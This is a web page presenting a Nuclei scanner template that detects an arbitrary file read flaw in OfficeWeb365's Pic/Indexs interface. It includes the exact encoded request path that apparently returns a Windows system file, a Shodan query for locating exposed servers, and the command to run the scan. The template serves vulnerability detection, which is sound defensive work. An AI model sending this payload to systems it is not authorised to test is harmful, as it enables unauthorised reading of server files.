Skip to content

OfficeWeb365 Indexs Interface - Arbitary File Read

ID: office365-indexs-fileread

Severity: high

Author: DhiyaneshDK

Tags: officeweb365,lfi

There is any file reading in the officeWeb365 Indexs interface.

id: office365-indexs-fileread
info:
name: OfficeWeb365 Indexs Interface - Arbitary File Read
author: DhiyaneshDK
severity: high
description: |
There is any file reading in the officeWeb365 Indexs interface.
reference:
- https://github.com/wy876/POC/blob/main/OfficeWeb365_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
shodan-query: "OfficeWeb365"
tags: officeweb365,lfi
http:
- method: GET
path:
- "{{BaseURL}}/Pic/Indexs?imgs=DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "for 16-bit app support"
- type: word
part: body
words:
- "image/png"
- type: status
status:
- 200
# digest: 490a0046304402201041759a785b8567f83956e342d4a47cb08dcb4784a9442ebdcfa1ed1601172d0220111e320a4b0f63ce2c2511077551dffa2bf8558e409b3bfb62c47a6f1a534f17:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/office365-indexs-fileread.yaml"

View on Github